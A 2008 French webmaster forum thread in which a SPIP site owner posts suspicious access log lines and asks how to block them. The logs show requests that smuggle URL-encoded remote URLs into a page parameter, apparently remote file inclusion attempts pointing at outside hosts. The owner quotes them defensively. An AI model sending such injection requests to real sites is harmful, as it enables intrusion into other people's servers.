Formation par Olivier Duffez

Formation au référencement par Olivier Duffez, créateur de WebRankInfo !
Une formule efficace alliant théorie et pratique, avec une haute disponibilité des intervenants
Cette formule a déjà convaincu plusieurs centaines d'entreprises, pourquoi pas vous ?
Réservez vite votre place en ligne (convention possible pour imputer sur le budget formation)

Formation référencement Marseille

inquiet, logs suspects
Poster un nouveau sujet Imprimer cette discussion    Forum -> Administration d'un site Web   Les dernières discussions de ce forum sont disponibles au format RSS
Voir le sujet précédent :: Voir le sujet suivant  
Auteur Message
 
tofm2
WRInaute accro
WRInaute accro

Inscrit le: 09 Avr 2005
Messages: 1275
Localisation: Reuben el Arkhab
URL permanente de ce messagePosté le : Mar Mar 04, 2008 8:53    Sujet du message: inquiet, logs suspects
Bonjour

depuis quelque temps, je tombe sur des logs suspects sur un de mes sites développé sous spip

(à voir sur écran large)

nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10536 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:00 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10515 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:38:01 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.northfans.ch%2Fforum%2Fadmin%2Fsettings%2Fgucor%2Fujusu%2F&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 10540 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

ce qui m'inquiète c'est les codes ascii qui remplacent les caractères / et :

des fois j'ai des url de 3 kms avec des tentatives d'injection de code et d'URL

nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:32 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11315 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:33 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11316 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
nat1024.national-net.com www.monsite .com - [04/Mar/2008:00:39:34 +0100] "GET /spip.php?breve2&debut_breves=5&debut_breves=http%3A%2F%2Fsahel55.com%2Farticles%2Fomaduro%2Fkimumid%2F&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5&debut_breves=5 HTTP/1.0" 200 11303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"


QUe penser de cette activité, sachant que si je tape cette URL dans la barre d'adresse de mon navigateur, je n'ai rien de particulier que l'article correspondant (code 200)


Y a t'il un moyen de parer cette activité, avec .htaccess, une rewrite rule ou je ne sais pas..

merci de votre attention.
 
tofm2 Visiter le site web du posteur
Lomax7
WRInaute impliqué
WRInaute impliqué

Inscrit le: 29 Mar 2007
Messages: 336
Localisation: Toulouse
URL permanente de ce messagePosté le : Mar Mar 04, 2008 9:44    Sujet du message: inquiet, logs suspects
Si tu as des pages dont les url sont sensibles, tu peux employer des regex,
c'est simple et efficace.
 
Lomax7 Visiter le site web du posteur
tofm2
WRInaute accro
WRInaute accro

Inscrit le: 09 Avr 2005
Messages: 1275
Localisation: Reuben el Arkhab
URL permanente de ce messagePosté le : Mar Mar 04, 2008 20:09    Sujet du message: inquiet, logs suspects
Lomax7 a écrit:
Si tu as des pages dont les url sont sensibles, tu peux employer des regex,
c'est simple et efficace.



oui, mais entre autres ??

à quoi correspondent ces logs, j'en ai de plus en plus ...
 
tofm2 Visiter le site web du posteur
 
Montrer les messages depuis:   
Revenir en haut    Forum -> Administration d'un site Web Toutes les heures sont au format GMT + 2 Heures
Page 1 sur 1 - 
Connexion
Nom d'utilisateur:    Mot de passe:      Se connecter automatiquement à chaque visite    

Autres sujets de discussion :

CLIQUEZ ICI pour vous inscrire à WebRankInfo (forum, annuaire, outils...)

Connexion

© 2001-2005 phpBB Group, support français
Personnalisation : WebRankInfo ™

 ODP  Firefox  Alsacreations  annuaire webmaster Yagoort